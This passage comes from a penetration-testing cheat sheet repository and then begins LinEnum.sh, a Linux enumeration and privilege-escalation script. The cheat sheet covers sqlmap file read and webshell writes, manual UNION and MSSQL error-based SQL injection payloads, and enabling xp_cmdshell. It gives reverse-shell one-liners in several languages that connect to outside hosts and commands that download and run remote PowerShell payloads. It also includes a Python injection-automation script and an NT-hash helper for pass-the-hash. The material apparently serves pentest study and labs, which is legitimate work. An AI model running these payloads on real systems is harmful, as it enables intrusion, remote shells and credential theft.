database_name -T table_name --columns 730 | ``` 731 | 732 | #### Dump a table 733 | (`--dump` honours -D/-T; `--dump-all` ignores them and dumps every database) 734 | ```bash 735 | ./sqlmap.py -u http://localhost/Less-1/?id=1 -D database_name -T table_name --dump 736 | ``` 737 | 738 | #### Set Cookie 739 | (`--cookie` takes the cookie string itself, without the `Cookie:` header name) 740 | ```bash 741 | ./sqlmap.py -u http://target/ovidentia/index.php\?tg\=delegat\&idx\=mem\&id\=1 --cookie "OV1364928461=6kb5jvu7f6lg93qlo3vl9111f8" --random-agent --risk 3 --level 5 --dbms=mysql -p id --dbs 742 | ``` 743 | 744 | #### Checking Privileges 745 | 746 | ```bash 747 | ./sqlmap.py -u http://localhost/Less-1/?id=1 --privileges | grep FILE 748 | ``` 749 | 750 | #### Reading file 751 | 752 | ```bash 753 | ./sqlmap.py -u <URL> --file-read=<file to read> 754 | ``` 755 | 756 | ```bash 757 | ./sqlmap.py -u http://localhost/Less-1/?id=1 --file-read=/etc/passwd 758 | ``` 759 | 760 | #### Writing file 761 | 762 | ``` 763 | ./sqlmap.py -u <url> --file-write=<file> --file-dest=<path> 764 | ``` 765 | 766 | ``` 767 | ./sqlmap.py -u http://localhost/Less-1/?id=1 --file-write=shell.php --file-dest=/var/www/html/shell-php.php 768 | ``` 769 | 770 | #### POST 771 | 772 | ```bash 773 | ./sqlmap.py -u <POST-URL> --data="<POST-parameters>" 774 | ``` 775 | 776 | ```bash 777 | ./sqlmap.py -u http://localhost/Less-11/ --data "uname=teste&passwd=&submit=Submit" -p uname 778 | ``` 779 | 780 | You can also feed sqlmap a saved raw request (e.g. from Burp) instead of the URL and data: 781 | 782 | ```bash 783 | ./sqlmap.py -r post-request.txt -p uname 784 | ``` 785 | 786 | ### Bare Hands 787 | 788 | #### GET 789 | 790 | #### Error-Based 791 | 792 | #### Simple test 793 | 794 | Add a single quote `'` to the parameter and look for a database error in the response 795 | 796 | Example: 797 | 798 | ``` 799 | http://192.168.1.104/Less-1/?id=5' 800 | ``` 801 | 802 | #### Fuzzing 803 | 804 | Increase the ORDER BY column number to find how many columns the original query returns 805 | 806 | `http://192.168.1.104/Less-1/?id=-1 order by 1` 807 | 808 | `http://192.168.1.104/Less-1/?id=-1 order by 2` 809 | 810 | `http://192.168.1.104/Less-1/?id=-1 order by 3` 811 | 812 | (until it starts returning an error; the last number that worked is the column count) 813 
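The two manual steps of the Bare Hands section (walking `order by N` until the error above, then a `union select` with markers to see which column reaches the page) are mechanical enough to script. The following is an added example and not code from the cheat sheet: it only assumes a `probe` callback that sends one value for the injectable parameter and returns the response body, so it can sit on top of `requests`, Burp, or anything else. The `make_fake_backend` function is a constructed stand-in for a vulnerable page so the example runs offline; the error strings it emits mirror real MySQL/PostgreSQL messages, and the marker values (91001..., zzNzz) are arbitrary choices.

```python
"""Automate ORDER BY column counting and UNION SELECT column discovery (added example)."""
import re
from typing import Callable, List

Probe = Callable[[str], str]  # receives the injectable parameter's value, returns the page body

# Substrings that betray a failed ORDER BY / UNION in MySQL and PostgreSQL error pages.
SQL_ERRORS = (
    "Unknown column",                      # MySQL: ORDER BY past the last column
    "different number of columns",         # MySQL: UNION column-count mismatch
    "You have an error in your SQL syntax",
    "ORDER BY position",                   # PostgreSQL: "ORDER BY position N is not in select list"
    "cannot be matched",                   # PostgreSQL: UNION type mismatch
    "invalid input syntax",                # PostgreSQL: string marker in an integer column
)


def looks_like_sql_error(body: str) -> bool:
    return any(err in body for err in SQL_ERRORS)


def count_columns(probe: Probe, max_cols: int = 64) -> int:
    """'order by 1', 'order by 2', ...; the last n that did not error is the column count."""
    for n in range(1, max_cols + 1):
        if looks_like_sql_error(probe(f"-1 order by {n}")):
            return n - 1
    raise RuntimeError(f"no ORDER BY error up to {max_cols}; is the parameter really injectable?")


def find_reflected_columns(probe: Probe, ncols: int, dbms: str = "mysql") -> List[int]:
    """UNION SELECT with unique markers; returns the 1-based positions that reach the page.
    MySQL coerces types, so one request with numeric markers is enough. PostgreSQL needs
    matching types per column, so each position is tried with an integer marker and then a
    quoted string marker, with NULL everywhere else (the NULL, NULL, ... form from the page)."""
    if dbms == "mysql":
        markers = [str(91000 + i) for i in range(1, ncols + 1)]
        body = probe("-1 union select " + ", ".join(markers))
        if looks_like_sql_error(body):
            raise RuntimeError("UNION failed; re-check the column count")
        return [i for i, m in enumerate(markers, 1) if m in body]
    reflected = []
    for pos in range(1, ncols + 1):
        for marker in (str(91000 + pos), f"'zz{pos}zz'"):
            row = ["NULL"] * ncols
            row[pos - 1] = marker
            body = probe("-1 union select " + ", ".join(row))
            if looks_like_sql_error(body):
                continue                    # type mismatch: try the other marker form
            if marker.strip("'") in body:
                reflected.append(pos)
            break                           # a compatible type was found for this position
    return reflected


def make_fake_backend(dbms: str, coltypes=("int", "text", "text"), shown: int = 3) -> Probe:
    """Constructed stand-in for a vulnerable page: a 3-column query of which only column
    `shown` is rendered. Exists only so this example runs without a target."""
    ncols = len(coltypes)

    def probe(payload: str) -> str:
        m = re.fullmatch(r"-1 order by (\d+)", payload)
        if m and int(m.group(1)) > ncols:
            return ("Unknown column '%s' in 'order clause'" % m.group(1) if dbms == "mysql"
                    else "ERROR: ORDER BY position %s is not in select list" % m.group(1))
        m = re.fullmatch(r"-1 union select (.*)", payload)
        if m:
            values = [v.strip() for v in m.group(1).split(",")]
            if len(values) != ncols:
                return "The used SELECT statements have a different number of columns"
            if dbms == "postgres":          # PostgreSQL refuses mismatched UNION types
                for v, t in zip(values, coltypes):
                    if v != "NULL" and t == "text" and not v.startswith("'"):
                        return "ERROR: UNION types text and integer cannot be matched"
                    if v != "NULL" and t == "int" and v.startswith("'"):
                        return "ERROR: invalid input syntax for type integer"
            rendered = values[shown - 1].strip("'")
            return "<html><p>%s</p></html>" % rendered
        return "<html><p>no such id</p></html>"

    return probe


if __name__ == "__main__":
    for dbms in ("mysql", "postgres"):
        probe = make_fake_backend(dbms)
        n = count_columns(probe)
        print(dbms, "columns:", n, "reflected:", find_reflected_columns(probe, n, dbms))
```

Against a real target, replace `make_fake_backend(...)` with a function that does the HTTP request and returns the body; the reflected position it returns is the one where `version()`, `database()` and the information_schema queries in the following steps should be placed.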
| 814 | --- 815 | 816 | #### Finding what column is injectable 817 | 818 | **mysql** 819 | 820 | `http://192.168.1.104/Less-1/?id=-1 union select 1, 2, 3` 821 | 822 | (using the same number of columns you got in the previous step) 823 | 824 | **postgresql** 825 | 826 | `http://192.168.1.104/Less-1/?id=-1 union select NULL, NULL, NULL` 827 | 828 | (using the same number of columns you got in the previous step; PostgreSQL requires matching column types in a UNION, which NULL satisfies) 829 | 830 | one of the columns will be printed with its respective number; that position is where the functions below go 831 | 832 | --- 833 | 834 | #### Finding version 835 | 836 | **mysql** 837 | 838 | `http://192.168.1.104/Less-1/?id=-1 union select 1, 2, version()` 839 | 840 | **postgres** 841 | 842 | `http://192.168.1.104/Less-1/?id=-1 union select NULL, NULL, version()` 843 | 844 | 845 | #### Finding database name 846 | 847 | **mysql** 848 | 849 | `http://192.168.1.104/Less-1/?id=-1 union select 1,2, database()` 850 | 851 | **postgres** (there is no database() function in PostgreSQL) 852 | 853 | `http://192.168.1.104/Less-1/?id=-1 union select NULL,NULL, current_database()` 854 | 855 | 856 | #### Finding the current database user 857 | 858 | **mysql** 859 | 860 | `http://192.168.1.104/Less-1/?id=-1 union select 1, 2, current_user()` 861 | 862 | 863 | #### Finding databases 864 | 865 | **mysql** 866 | 867 | `http://192.168.1.104/Less-1/?id=-1 union select 1, 2, schema_name from information_schema.schemata` 868 | 869 | **postgres** 870 | 871 | `http://192.168.1.104/Less-1/?id=-1 union select NULL, NULL, datname from pg_database` 872 | 873 | #### Finding table names from a database 874 | 875 | **mysql** (string literals in single quotes; double quotes are identifier quotes in ANSI mode and in PostgreSQL) 876 | 877 | ``` 878 | http://192.168.1.104/Less-1/?id=-1 union select 1, 2, table_name from information_schema.tables where table_schema='database_name' 879 | ``` 880 | 881 | **postgres** (pg_tables has no table_catalog column, and a connection only sees its own database anyway) 882 | 883 | ``` 884 | http://192.168.1.104/Less-1/?id=-1 union select NULL, NULL, table_name from information_schema.tables where table_catalog='database_name' and table_schema='public' 885 | ``` 886 | 887 | #### Finding column names from a table 888 | 889 | **mysql** 890 | 891 | ``` 892 | http://192.168.1.104/Less-1/?id=-1 union 
select 1, 2, column_name from information_schema.columns where table_schema='database_name' and table_name='tablename' 893 | ``` 894 | **postgres** 895 | 896 | ``` 897 | http://192.168.1.104/Less-1/?id=-1 union select NULL, NULL, column_name from information_schema.columns where table_catalog='database_name' and table_name='tablename' 898 | ``` 899 | 900 | #### Concatenate 901 | 902 | Example: 903 | 904 | `http://192.168.1.104/Less-1/?id=-1 union select 1, 2, login from users;` 905 | `http://192.168.1.104/Less-1/?id=-1 union select 1, 2, password from users;` 906 | 907 | in one query 908 | 909 | `http://192.168.1.104/Less-1/?id=-1 union select 1, 2, concat(login,':',password) from users;` **mysql** 910 | `http://192.168.1.104/Less-1/?id=-1 union select NULL, NULL, login||':'||password from users;` **postgres** 911 | 912 | 913 | ### Error Based SQLI (USUALLY MS-SQL) 914 | Comparing the integer 1 with a varchar forces a conversion, and the error message ("Conversion failed when converting the varchar value '...' to data type int") leaks the selected value 915 | #### Current user 916 | 917 | `http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(user_name() as varchar(4096)))--` 918 | 919 | 920 | #### DBMS version 921 | 922 | `http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(@@version as varchar(4096)))--` 923 | 924 | 925 | #### Database name 926 | 927 | `http://192.168.1.104/Less-1/?id=-1 or db_name(0)=0 --` 928 | 929 | 930 | #### Tables from a database 931 | 932 | `http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM dbname..sysobjects where xtype='U')--` 933 | 934 | --- 935 | 936 | `http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM dbname..sysobjects where xtype='U' AND name NOT IN ('previouslyFoundTable',...))--` 937 | 938 | 939 | #### Columns within a table 940 | 941 | 942 | `http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(dbname..syscolumns.name as varchar(4096)) FROM dbname..syscolumns, dbname..sysobjects WHERE dbname..syscolumns.id=dbname..sysobjects.id AND dbname..sysobjects.name = 'tablename')--` 943 | 944 | > remember to change **dbname** 
and **tablename** accordingly with the given situation 945 | > after each iteration a new column name will be found, make sure to add it to **previously found column name**, comma separated, as in the next sample 946 | 947 | `http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(dbname..syscolumns.name as varchar(4096)) FROM dbname..syscolumns, dbname..sysobjects WHERE dbname..syscolumns.id=dbname..sysobjects.id AND dbname..sysobjects.name = 'tablename' AND dbname..syscolumns.name NOT IN('previously found column name', ...))--` 948 | 949 | 950 | #### Actual data 951 | 952 | 953 | `http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(columnName as varchar(4096)) FROM tablename)--` 954 | 955 | > after each iteration a new row value will be found, make sure to add it to **previously found row data**, comma separated, as in the next sample (the filter is a WHERE clause on the column itself) 956 | 957 | `http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(columnName as varchar(4096)) FROM tablename WHERE columnName NOT IN('previously found row data', ...))--` 958 | 959 | 960 | #### Shell commands 961 | 962 | `EXEC master..xp_cmdshell <command>` 963 | 964 | > requires sysadmin rights (e.g. the 'sa' user), and xp_cmdshell is disabled by default 965 | 966 | #### Enabling shell commands 967 | 968 | `EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;` 969 | 970 | 971 | ### Jenkins 972 | 973 | ## 974 | 975 | # Post Exploitation 976 | 977 | ## Reverse Shell 978 | 979 | 980 | ### PHP Reverse Shell 981 | 982 | ```php 983 | php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' 984 | ``` 985 | (the socket is file descriptor 3 in a fresh `php -r` process, which is what `<&3 >&3 2>&3` relies on) 986 | Tiny Reverse Shell 987 | 988 | ```php 989 | <?php 990 | exec("/bin/bash -c 'bash -i >& /dev/tcp/10.9.36.167/1337 0>&1'"); 991 | ``` 992 | 993 | ### Perl Reverse Shell 994 | 995 | ```perl 996 | perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh 
-i");};' 997 | 998 | ``` 999 | 1000 | ### Python Reverse Shell 1001 | 1002 | ```python 1003 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 1004 | ``` 1005 | 1006 | ### Ruby Reverse Shell 1007 | 1008 | ```ruby 1009 | ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' 1010 | ``` 1011 | 1012 | ### Bash Reverse Shell 1013 | 1014 | ```bash 1015 | bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 1016 | ``` 1017 | ### Powershell Reverse Shell 1018 | 1019 | Create a simple PowerShell script called reverse.ps1: 1020 | 1021 | ```powershell 1022 | function reverse_powershell { 1023 | $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() 1024 | } 1025 | ``` 1026 | Then load it from the directory it is in (Import-Module needs a path, or a module on PSModulePath): 1027 | ```powershell 1028 | powershell -ExecutionPolicy bypass -command "Import-Module .\reverse.ps1; reverse_powershell" 1029 | ``` 1030 | 1031 | ### Java Reverse Shell 1032 | This is Groovy syntax (note the `as String[]` cast and the missing semicolons), as used in the Jenkins script console: 1033 | ```groovy 1034 | r = Runtime.getRuntime() 1035 | p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) 1036 | p.waitFor() 1037 | ``` 1038 | 1039 | ### Xterm Reverse Shell 1040 | 1041 | One of the simplest forms of reverse shell is an xterm session. The following command should be run on the target. It will try to connect back to you (10.0.0.1) on TCP port 6001. 
1042 | 1043 | ```bash 1044 | xterm -display 10.0.0.1:1 1045 | ``` 1046 | 1047 | To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system): 1048 | 1049 | ```bash 1050 | Xnest :1 1051 | 1052 | ``` 1053 | 1054 | You’ll need to authorise the target to connect to you (command also run on your host): 1055 | 1056 | ```bash 1057 | xhost +targetip 1058 | ``` 1059 | 1060 | ## 1061 | 1062 | ## Linux 1063 | 1064 | ## Windows 1065 | 1066 | ### Transferring Files Without Metasploit 1067 | 1068 | #### Powershell 1069 | 1070 | Download files with powershell 1071 | 1072 | ```powershell 1073 | powershell -c "Invoke-WebRequest -uri 'http://Your-IP:Your-Port/winPEAS.bat' -OutFile 'C:\Windows\Temp\winPEAS.bat'" 1074 | ``` 1075 | 1076 | ```powershell 1077 | powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port 1078 | ``` 1079 | 1080 | ```powershell 1081 | powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')" 1082 | ``` 1083 | 1084 | Creating a server with python3 1085 | 1086 | ```shell 1087 | python -m http.server 1088 | ``` 1089 | 1090 | Creating a server with python2 1091 | 1092 | ```shell 1093 | python -m SimpleHTTPServer 80 1094 | ``` 1095 | 1096 | #### FTP 1097 | 1098 | You need to create a FTP server 1099 | 1100 | * Server Linux 1101 | Allow anonymous 1102 | 1103 | ```shell 1104 | python -m pyftpdlib -p 21 -u anonymous -P anonymous 1105 | ``` 1106 | 1107 | * Windows Client 1108 | 1109 | ```shell 1110 | ftp 1111 | open target_ip port 1112 | open 192.168.1.22 21 1113 | ``` 1114 | 1115 | we can simply run ftp -s:ftp_commands.txt and we can download a file with no user interaction. 
1116 | 1117 | like this (the script logs in anonymously, fetches the file in binary mode and exits): 1118 | 1119 | ```shell 1120 | C:\Users\kitsunesec\Desktop>echo open 10.9.122.8>ftp_commands.txt 1121 | C:\Users\kitsunesec\Desktop>echo anonymous>>ftp_commands.txt 1122 | C:\Users\kitsunesec\Desktop>echo whatever>>ftp_commands.txt 1123 | C:\Users\kitsunesec\Desktop>echo binary>>ftp_commands.txt 1124 | C:\Users\kitsunesec\Desktop>echo get file_to_download>>ftp_commands.txt 1125 | C:\Users\kitsunesec\Desktop>echo bye>>ftp_commands.txt 1126 | C:\Users\kitsunesec\Desktop>ftp -s:ftp_commands.txt 1127 | ``` 1128 | 1129 | #### Apache Server 1130 | 1131 | * server 1132 | Put your files into /var/www/html 1133 | 1134 | ```shell 1135 | cp nc.exe /var/www/html 1136 | systemctl start apache2 1137 | ``` 1138 | 1139 | * client 1140 | 1141 | Get via web browser, wget or powershell... 1142 | 1143 | ### Windows Pivoting 1144 | 1145 | #### Openssh for Tunneling 1146 | 1147 | Once you have SYSTEM on the target machine, download [openssh_for_windows](https://github.com/PowerShell/Win32-OpenSSH/releases) and unzip it: 1148 | ```powershell 1149 | powershell -command "Expand-Archive 'C:\<path-to-zipped-openssh>\openssh.zip' C:\<destination-folder>\" 1150 | ``` 1151 | 1152 | Then install it: 1153 | ```powershell 1154 | powershell -ExecutionPolicy Bypass -File c:\<path-to-unzipped-openssh-folder>\install-sshd.ps1 1155 | ``` 1156 | 1157 | Now, if needed, adjust the firewall rules: 1158 | ```powershell 1159 | powershell -Command "New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22" 1160 | ``` 1161 | 1162 | Start the sshd service: 1163 | 1164 | ```powershell 1165 | net start sshd 1166 | ``` 1167 | 1168 | After these steps a regular SSH tunnel suffices. From your Linux machine (`-D` opens a local SOCKS proxy on <tunnel_port>): 1169 | 1170 | ```bash 1171 | $ ssh -ACv -D <tunnel_port> <windows-user>@<windows-ip> 1172 | ``` 1173 | 1174 | Done: you now have a SOCKS proxy on 127.0.0.1:<tunnel_port> to tunnel through. 1175 | 1176 | 
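The pth-winexe and pth-smbclient commands in the Pass the hash section, and the hashdump output that feeds them, work on the NT hash: MD4 over the UTF-16LE encoding of the password, printed as 32 hex characters (the second half of an `LM:NT` pair). The following is an added example, not code from the cheat sheet, that implements MD4 in pure Python because `hashlib.new('md4')` is missing on many OpenSSL 3 builds; it lets you confirm a cracked or guessed password against a dumped hash offline, and sanity-check a value before pasting it into `--pw-nt-hash` (the placeholder used in the pth-smbclient examples above is not a valid hash and fails the check). Function names are my own.

```python
"""NT hash = MD4(UTF-16LE(password)), in pure Python (added example)."""
import struct

_MASK = 0xFFFFFFFF


def _lrot(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & _MASK


def _f(x, y, z): return (x & y) | (~x & z)
def _g(x, y, z): return (x & y) | (x & z) | (y & z)
def _h(x, y, z): return x ^ y ^ z


# (boolean function, message-word order, per-step shifts, additive constant) for the three MD4 rounds.
_ROUNDS = (
    (_f, tuple(range(16)),                                       (3, 7, 11, 19), 0x00000000),
    (_g, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13),  0x5A827999),
    (_h, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
)


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 over an arbitrary byte string."""
    msg = bytearray(data)
    bit_len = (len(data) * 8) & 0xFFFFFFFFFFFFFFFF
    msg.append(0x80)                                   # padding: 1 bit, zeros to 56 mod 64,
    msg.extend(b"\x00" * ((56 - len(msg)) % 64))       # then the 64-bit little-endian length
    msg += struct.pack("<Q", bit_len)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        s = state[:]
        for fn, order, shifts, const in _ROUNDS:
            for i, k in enumerate(order):
                t = (-i) % 4                           # registers are updated in the order a, d, c, b
                x, y, z = s[(t + 1) % 4], s[(t + 2) % 4], s[(t + 3) % 4]
                s[t] = _lrot((s[t] + fn(x, y, z) + X[k] + const) & _MASK, shifts[i % 4])
        state = [(a + b) & _MASK for a, b in zip(state, s)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """The value SAM dumps show and --pw-nt-hash expects: MD4 of the UTF-16LE password, hex encoded."""
    return md4(password.encode("utf-16-le")).hex()


def looks_like_nt_hash(value: str) -> bool:
    """Format check before pasting into a pth-* tool: exactly 32 hex digits (an LM:NT pair is accepted)."""
    v = value.split(":")[-1].strip()
    return len(v) == 32 and all(c in "0123456789abcdefABCDEF" for c in v)


def password_matches(password: str, dumped: str) -> bool:
    """Offline check of a candidate password against a dumped NT (or LM:NT) hash."""
    return looks_like_nt_hash(dumped) and nt_hash(password) == dumped.split(":")[-1].strip().lower()


if __name__ == "__main__":
    print(nt_hash("password"))     # the well-known hash of "password"
    print(password_matches("password", "aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c"))
```

Because NT hashes are unsalted, the same password always yields the same hash, which is exactly why a dumped hash can be replayed with pth-smbclient without ever cracking it.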
# Resources

#### HTTP/HTTPS Servers

HTTPS using Python

Create the certificate (self-signed; the key and the certificate end up together in server.pem):

```shell
openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
```

Start the HTTPS server (Python 3; the `BaseHTTPServer`/`ssl.wrap_socket` form this was originally written with only runs on Python 2, and `ssl.wrap_socket` no longer exists in Python 3.12):

```python
import http.server
import ssl

httpd = http.server.HTTPServer(('0.0.0.0', 443), http.server.SimpleHTTPRequestHandler)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(certfile='./server.pem')   # key and cert from the openssl command above
httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True)
httpd.serve_forever()
```

Binding port 443 needs root. Clients will reject the self-signed certificate unless told otherwise (`curl -k`, `wget --no-check-certificate`; PowerShell 7's `Invoke-WebRequest -SkipCertificateCheck`, whereas Windows PowerShell 5.1 has no such switch).

## Wordlists

* Wordlists
  * [PacketStorm](https://packetstormsecurity.com/Crackers/wordlists/dictionaries/)
  * [SecLists](https://github.com/danielmiessler/SecLists)
  * [cotse](http://www.cotse.com/tools/wordlists1.htm)
* Default Password
  * [DefaultPassword](http://www.defaultpassword.com/)
  * [RouterPassword](http://www.routerpasswords.com/)
* Leak
  * [Pastebin](https://pastebin.com)
* Tables
  * [RainbowCrack](https://project-rainbowcrack.com/table.htm)

## Contribution

[HOW TO](https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets/tree/master/contribution.md)

--------------------------------------------------------------------------------
/CheatSheets/linux/pos_xpl/LinEnum.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash 2 | #A script to enumerate local information from a Linux host 3 | v="version 0.6" 4 | #@rebootuser 5 | 6 | #help function 7 | usage () 8 | { 9 | echo -e "\n\e[00;31m#########################################################\e[00m" 10 | echo -e "\e[00;31m#\e[00m" "\e[00;33mLocal Linux Enumeration & Privilege Escalation Script\e[00m" "\e[00;31m#\e[00m" 11 | echo -e 
"\e[00;31m#########################################################\e[00m" 12 | echo -e "\e[00;33m# www.rebootuser.com | @rebootuser \e[00m" 13 | echo -e "\e[00;33m# $v\e[00m\n" 14 | echo -e "\e[00;33m# Example: ./LinEnum.sh -k keyword -r report -e /tmp/ -t \e[00m\n" 15 | 16 | echo "OPTIONS:" 17 | echo "-k Enter keyword" 18 | echo "-e Enter export location" 19 | echo "-t Include thorough (lengthy) tests" 20 | echo "-r Enter report name" 21 | echo "-h Displays this help text" 22 | echo -e "\n" 23 | echo "Running with no options = limited scans/no output file" 24 | 25 | echo -e "\e[00;31m#########################################################\e[00m" 26 | } 27 | while getopts "h:k:r:e:t" option; do 28 | case "${option}" in 29 | k) keyword=${OPTARG};; 30 | r) report=${OPTARG}"-"`date +"%d-%m-%y"`;; 31 | e) export=${OPTARG};; 32 | t) thorough=1;; 33 | h) usage; exit;; 34 | *) usage; exit;; 35 | esac 36 | done 37 | 38 | echo -e "\n\e[00;31m#########################################################\e[00m" |tee -a $report 2>/dev/null 39 | echo -e "\e[00;31m#\e[00m" "\e[00;33mLocal Linux Enumeration & Privilege Escalation Script\e[00m" "\e[00;31m#\e[00m" |tee -a $report 2>/dev/null 40 | echo -e "\e[00;31m#########################################################\e[00m" |tee -a $report 2>/dev/null 41 | echo -e "\e[00;33m# www.rebootuser.com\e[00m" |tee -a $report 2>/dev/null 42 | echo -e "\e[00;33m# $version\e[00m\n" |tee -a $report 2>/dev/null 43 | 44 | echo "Debug Info" |tee -a $report 2>/dev/null 45 | 46 | if [ "$keyword" ]; then 47 | echo "keyword = $keyword" |tee -a $report 2>/dev/null 48 | else 49 | : 50 | fi 51 | 52 | if [ "$report" ]; then 53 | echo "report name = $report" |tee -a $report 2>/dev/null 54 | else 55 | : 56 | fi 57 | 58 | if [ "$export" ]; then 59 | echo "export location = $export" |tee -a $report 2>/dev/null 60 | else 61 | : 62 | fi 63 | 64 | if [ "$thorough" ]; then 65 | echo "thorough tests = enabled" |tee -a $report 2>/dev/null 66 | else 67 | echo 
"thorough tests = disabled" |tee -a $report 2>/dev/null 68 | fi 69 | 70 | sleep 2 71 | 72 | if [ "$export" ]; then 73 | mkdir $export 2>/dev/null 74 | format=$export/LinEnum-export-`date +"%d-%m-%y"` 75 | mkdir $format 2>/dev/null 76 | else 77 | : 78 | fi 79 | 80 | who=`whoami` 2>/dev/null |tee -a $report 2>/dev/null 81 | echo -e "\n" |tee -a $report 2>/dev/null 82 | 83 | echo -e "\e[00;33mScan started at:"; date |tee -a $report 2>/dev/null 84 | echo -e "\e[00m\n" |tee -a $report 2>/dev/null 85 | 86 | echo -e "\e[00;33m### SYSTEM ##############################################\e[00m" |tee -a $report 2>/dev/null 87 | 88 | #basic kernel info 89 | unameinfo=`uname -a 2>/dev/null` 90 | if [ "$unameinfo" ]; then 91 | echo -e "\e[00;31mKernel information:\e[00m\n$unameinfo" |tee -a $report 2>/dev/null 92 | echo -e "\n" |tee -a $report 2>/dev/null 93 | else 94 | : 95 | fi 96 | 97 | procver=`cat /proc/version 2>/dev/null` 98 | if [ "$procver" ]; then 99 | echo -e "\e[00;31mKernel information (continued):\e[00m\n$procver" |tee -a $report 2>/dev/null 100 | echo -e "\n" |tee -a $report 2>/dev/null 101 | else 102 | : 103 | fi 104 | 105 | #search all *-release files for version info 106 | release=`cat /etc/*-release 2>/dev/null` 107 | if [ "$release" ]; then 108 | echo -e "\e[00;31mSpecific release information:\e[00m\n$release" |tee -a $report 2>/dev/null 109 | echo -e "\n" |tee -a $report 2>/dev/null 110 | else 111 | : 112 | fi 113 | 114 | #target hostname info 115 | hostnamed=`hostname 2>/dev/null` 116 | if [ "$hostnamed" ]; then 117 | echo -e "\e[00;31mHostname:\e[00m\n$hostnamed" |tee -a $report 2>/dev/null 118 | echo -e "\n" |tee -a $report 2>/dev/null 119 | else 120 | : 121 | fi 122 | 123 | echo -e "\e[00;33m### USER/GROUP ##########################################\e[00m" |tee -a $report 2>/dev/null 124 | 125 | #current user details 126 | currusr=`id 2>/dev/null` 127 | if [ "$currusr" ]; then 128 | echo -e "\e[00;31mCurrent user/group info:\e[00m\n$currusr" |tee -a $report 
2>/dev/null 129 | echo -e "\n" |tee -a $report 2>/dev/null 130 | else 131 | : 132 | fi 133 | 134 | #last logged on user information 135 | lastlogedonusrs=`lastlog 2>/dev/null |grep -v "Never" 2>/dev/null` 136 | if [ "$lastlogedonusrs" ]; then 137 | echo -e "\e[00;31mUsers that have previously logged onto the system:\e[00m\n$lastlogedonusrs" |tee -a $report 2>/dev/null 138 | echo -e "\n" |tee -a $report 2>/dev/null 139 | else 140 | : 141 | fi 142 | 143 | 144 | #who else is logged on 145 | loggedonusrs=`w 2>/dev/null` 146 | if [ "$loggedonusrs" ]; then 147 | echo -e "\e[00;31mWho else is logged on:\e[00m\n$loggedonusrs" |tee -a $report 2>/dev/null 148 | echo -e "\n" |tee -a $report 2>/dev/null 149 | else 150 | : 151 | fi 152 | 153 | #lists all id's and respective group(s) 154 | grpinfo=`for i in $(cat /etc/passwd 2>/dev/null| cut -d":" -f1 2>/dev/null);do id $i;done 2>/dev/null` 155 | if [ "$grpinfo" ]; then 156 | echo -e "\e[00;31mGroup memberships:\e[00m\n$grpinfo" |tee -a $report 2>/dev/null 157 | echo -e "\n" |tee -a $report 2>/dev/null 158 | else 159 | : 160 | fi 161 | 162 | #checks to see if any hashes are stored in /etc/passwd (depreciated *nix storage method) 163 | hashesinpasswd=`grep -v '^[^:]*:[x]' /etc/passwd 